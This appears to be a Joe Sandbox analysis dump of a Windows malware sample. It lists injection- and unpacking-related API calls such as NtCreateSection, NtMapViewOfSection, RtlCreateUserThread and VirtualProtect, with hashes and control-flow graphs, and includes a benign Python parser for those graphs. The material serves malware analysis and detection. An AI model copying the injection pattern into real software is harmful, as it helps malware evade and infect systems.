                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
                                                                                                                            • Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
                                                                                                                            • Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

                                                                                                                             Control-flow Graph (rendered graph not reproduced; first basic block 401606-401607)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1652636561-0
                                                                                                                            • Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
                                                                                                                            • Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
                                                                                                                            • Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

                                                                                                                             Control-flow Graph (rendered graph not reproduced; first basic block 401627-40162c)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
                                                                                                                            • Opcode Fuzzy Hash: d0133b7f997d866bd9f22ed6d19c972adefd9311a1b1e22c4a59d1e070b776c3
                                                                                                                            • Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

                                                                                                                             Control-flow Graph (rendered graph not reproduced; first basic block 401641-401659)
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                                                                                            • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                                                                                            • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                                                                                             Control-flow Graph (rendered graph not reproduced; first basic block 403103-403127; block 4031e8-403243 calls RtlCreateUserThread and NtTerminateProcess)
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                                                                                            • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                                                                                            • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                                                                                             Control-flow Graph (rendered graph not reproduced; first basic block 403257-40325f; block 4031f0-403243 calls RtlCreateUserThread and NtTerminateProcess)
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                                                                                            • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                                                                                            • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 66 53003c-530047 67 530049 66->67 68 53004c-530263 call 530a3f call 530e0f call 530d90 VirtualAlloc 66->68 67->68 83 530265-530289 call 530a69 68->83 84 53028b-530292 68->84 89 5302ce-5303c2 VirtualProtect call 530cce call 530ce7 83->89 86 5302a1-5302b0 84->86 88 5302b2-5302cc 86->88 86->89 88->86 95 5303d1-5303e0 89->95 96 5303e2-530437 call 530ce7 95->96 97 530439-5304b8 VirtualFree 95->97 96->95 98 5305f4-5305fe 97->98 99 5304be-5304cd 97->99 103 530604-53060d 98->103 104 53077f-530789 98->104 102 5304d3-5304dd 99->102 102->98 106 5304e3-530505 102->106 103->104 109 530613-530637 103->109 107 5307a6-5307b0 104->107 108 53078b-5307a3 104->108 117 530517-530520 106->117 118 530507-530515 106->118 110 5307b6-5307cb 107->110 111 53086e-5308be LoadLibraryA 107->111 108->107 112 53063e-530648 109->112 114 5307d2-5307d5 110->114 116 5308c7-5308f9 111->116 112->104 115 53064e-53065a 112->115 119 5307d7-5307e0 114->119 120 530824-530833 114->120 115->104 121 530660-53066a 115->121 122 530902-53091d 116->122 123 5308fb-530901 116->123 124 530526-530547 117->124 118->124 125 5307e2 119->125 126 5307e4-530822 119->126 128 530839-53083c 120->128 127 53067a-530689 121->127 123->122 129 53054d-530550 124->129 125->120 126->114 130 530750-53077a 127->130 131 53068f-5306b2 127->131 128->111 132 53083e-530847 128->132 134 5305e0-5305ef 129->134 135 530556-53056b 129->135 130->112 136 5306b4-5306ed 131->136 137 5306ef-5306fc 131->137 138 53084b-53086c 132->138 139 530849 132->139 134->102 142 53056f-53057a 135->142 143 53056d 135->143 136->137 140 53074b 137->140 141 5306fe-530748 137->141 138->128 139->111 140->127 141->140 146 53059b-5305bb 142->146 147 53057c-530599 142->147 143->134 150 5305bd-5305db 146->150 147->150 150->129
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_530000_DE97.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 465 415cf4-415cfb 466 415d00-415d10 465->466 467 415d12 466->467 468 415d18-415d1b 466->468 467->468 468->466 469 415d1d-415d3e LoadLibraryW call 415680 call 415910 468->469 474 415d40-415d47 469->474 475 415d57-415d5d 474->475 476 415d49-415d53 474->476 477 415d64-415d6b 475->477 478 415d5f call 415670 475->478 476->475 480 415d7a-415d81 477->480 481 415d6d-415d74 InterlockedDecrement 477->481 478->477 480->474 483 415d83-415d93 480->483 481->480 484 415da0-415db0 483->484 485 415db2 484->485 486 415db9-415dbc 484->486 485->486 486->484 487 415dbe-415dc9 486->487 488 415dd0-415dd5 487->488 489 415dd7-415ddd 488->489 490 415ddf-415de5 488->490 489->490 491 415de7-415df4 489->491 490->488 490->491
                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNELBASE(00417374), ref: 00415D22
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00415D74
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: DecrementInterlockedLibraryLoad
                                                                                                                            • String ID: @3#v$k`$}$
                                                                                                                            • API String ID: 1728580480-3392953598
                                                                                                                            • Opcode ID: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction ID: e5749c029843646b42c966e7ad9aac78be9f25e1622ba3818e79b170e44d005a
                                                                                                                            • Opcode Fuzzy Hash: 1220cc1870a5b44b748834b9607dd4274ce9cfefc33c15e109127477b7c52050
                                                                                                                            • Instruction Fuzzy Hash: B7210830940A50CFC7249B24BD497EA7760EBC8321FA2847BD9499B291C67898C0CB8D

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 493 415680-4157c0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(004F23E0), ref: 0041575F
                                                                                                                            • GetProcAddress.KERNEL32(00000000,00419DC8), ref: 0041579C
                                                                                                                            • VirtualProtect.KERNELBASE(004F2224,004F23DC,00000040,?), ref: 004157BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777292131.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_40b000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction ID: 9cbdbad7550f6ba77ebf9f75069ac8a0e3d788a9a6da5ffb341793c156349206
                                                                                                                            • Opcode Fuzzy Hash: 2d56005a38fc95e630bca09700ccda0a937271889cc88ec342df8eead2b79204
                                                                                                                            • Instruction Fuzzy Hash: AD311960518780CAE305CB78FE647A23AA2EB69704F04807DD5488B3F1D7FE5928C72E

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 531 6d61b2-6d61cb 532 6d61cd-6d61cf 531->532 533 6d61d6-6d61e2 CreateToolhelp32Snapshot 532->533 534 6d61d1 532->534 535 6d61e4-6d61ea 533->535 536 6d61f2-6d61ff Module32First 533->536 534->533 535->536 543 6d61ec-6d61f0 535->543 537 6d6208-6d6210 536->537 538 6d6201-6d6202 call 6d5e71 536->538 541 6d6207 538->541 541->537 543->532 543->536
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006D61DA
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 006D61FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D3000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_6d3000_DE97.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 9ddca0fde8d1d96f1e360ec9eb91450bae318ceeca68f9febacf903917ac4f29
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: 94F062369007106BD7203AF9DC8DBAEB6EEAF49765F10062AF642916C1DA70E8458A61

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 544 530e0f-530e24 SetErrorMode * 2 545 530e26 544->545 546 530e2b-530e2c 544->546 545->546
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777432655.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_530000_DE97.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
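The control_flow_graph lines in these listings are the rendered graph flattened to text: each basic block appears as its node number, its address range and any API or internal call it contains, and each edge as src->dst. The parser below is an added example written for this page; it is not part of Joe Sandbox or of its report, and the token grammar it assumes is inferred only from the dumps shown here (a node number followed by an address or address range opens a block, "call <addr>" is an intra-module call, "* N" is a repeat count for the preceding API). It takes the 0x403257 function (RtlCreateUserThread / NtTerminateProcess) and the 0x530e0f function (SetErrorMode called twice) as embedded input and recovers which blocks call which APIs, what is reachable from the entry block, and where the graph loops back on itself (block 530 at 4032be branches only to itself).

```python
import re
from collections import deque

# Constructed input: two control_flow_graph dumps copied verbatim from the report
# (the RtlCreateUserThread/NtTerminateProcess function at 0x403257 and the paired
# SetErrorMode function at 0x530e0f).
CFG_THREAD = (
    "control_flow_graph 512 403257-40325f 513 4031f0-403243 RtlCreateUserThread "
    "NtTerminateProcess 512->513 514 403261-40327f 512->514 516 403246-40324b "
    "513->516 520 403281 514->520 521 403286-403290 514->521 520->521 522 "
    "403283-403285 520->522 523 403292 521->523 524 403298-4032ba call 4012ec "
    "521->524 522->521 523->524 525 403293-403297 523->525 530 4032be 524->530 530->530"
)
CFG_ERRMODE = ("control_flow_graph 544 530e0f-530e24 SetErrorMode * 2 545 530e26 "
               "544->545 546 530e2b-530e2c 544->546 545->546")

NODE_ID = re.compile(r"^\d+$")                    # graph node number
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")  # "start" or "start-end" of a block
EDGE = re.compile(r"^(\d+)->(\d+)$")               # "src->dst"


def parse_cfg(dump):
    """Parse one dump into {nodes, edges, entry}; the first block listed is the entry.

    Grammar assumed from the page: "<id> <addr> [<api> [* <n>] | call <addr>]..." per
    block, "<src>-><dst>" per edge.
    """
    tokens = dump.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, order, cur = {}, [], [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = int(tok)
            nodes[cur] = {"addr": tokens[i + 1], "apis": [], "calls": []}
            order.append(cur)
            i += 1
        elif tok == "call" and i + 1 < len(tokens):  # intra-module call target
            nodes[cur]["calls"].append(tokens[i + 1])
            i += 1
        elif tok == "*" and i + 1 < len(tokens):     # "<api> * N" repeat count
            name, _ = nodes[cur]["apis"][-1]
            nodes[cur]["apis"][-1] = (name, int(tokens[i + 1]))
            i += 1
        else:                                        # plain API name in this block
            nodes[cur]["apis"].append((tok, 1))
        i += 1
    return {"nodes": nodes, "edges": edges, "entry": order[0] if order else None}


def reachable(cfg, start):
    """Set of block ids reachable from `start` by following edges (BFS)."""
    succ = {}
    for s, d in cfg["edges"]:
        succ.setdefault(s, []).append(d)
    seen, queue = {start}, deque([start])
    while queue:
        for d in succ.get(queue.popleft(), []):
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return seen


def api_blocks(cfg):
    """{api_name: [block ids]} for every Windows API named in the graph."""
    out = {}
    for nid, node in cfg["nodes"].items():
        for name, _ in node["apis"]:
            out.setdefault(name, []).append(nid)
    return out


def api_call_count(cfg, name):
    """Static call sites of `name`, honouring the "* N" multiplier."""
    return sum(c for node in cfg["nodes"].values() for n, c in node["apis"] if n == name)


def self_loops(cfg):
    """Blocks with an edge back to themselves (a tight loop or jump-to-self stall)."""
    return sorted(s for s, d in cfg["edges"] if s == d)


def summarize(cfg):
    """Compact triage summary of one parsed function graph."""
    reach = reachable(cfg, cfg["entry"])
    return {
        "blocks": len(cfg["nodes"]),
        "edges": len(cfg["edges"]),
        "unreachable_from_entry": sorted(set(cfg["nodes"]) - reach),
        "apis": {n: sorted(b) for n, b in api_blocks(cfg).items()},
        "self_loops": self_loops(cfg),
    }


if __name__ == "__main__":
    for label, dump in (("0x403257", CFG_THREAD), ("0x530e0f", CFG_ERRMODE)):
        print(label, summarize(parse_cfg(dump)))
```

The graph is static (the IDA plugin's disassembly of the memory dump), so reachability here says a path exists in the code, not that the sandbox saw it run; that dynamic information is what the Executed / Not Executed colouring of the rendered graph carries, and it does not survive in the text dump.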

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 547 4019c0-4019c6 548 4019e7-401a10 547->548 549 4019c8-4019dd call 40127e 547->549 557 401a13-401a46 call 40127e Sleep call 4014fb 548->557 558 401a09-401a0c 548->558 566 401a55-401a5b 557->566 567 401a48-401a50 call 4015fb 557->567 558->557 570 401a60-401a65 566->570 571 401a69 566->571 567->566 572 401a6c-401a9a call 40127e 570->572 571->570 571->572
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                                                                                            • Opcode Fuzzy Hash: 4123eb2909a1ca54cf4c12ed559c674bae09e9b4b475d8bbd2d0155f979259f4
                                                                                                                            • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                                                                                            • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                                                                                            • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                                                                              • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                                                                              • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_DE97.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4152845823-0
                                                                                                                            • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                                                                                            • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                                                                                            • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_DE97.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_DE97.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006D5EC2
Memory Dump Source
• Source File: 00000009.00000002.2777599585.00000000006D3000.00000040.00000020.00020000.00000000.sdmp, Offset: 006D3000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_6d3000_DE97.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• Sleep.KERNELBASE(00001388), ref: 00401A31
  • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
  • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
Memory Dump Source
• Source File: 00000009.00000002.2777267283.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
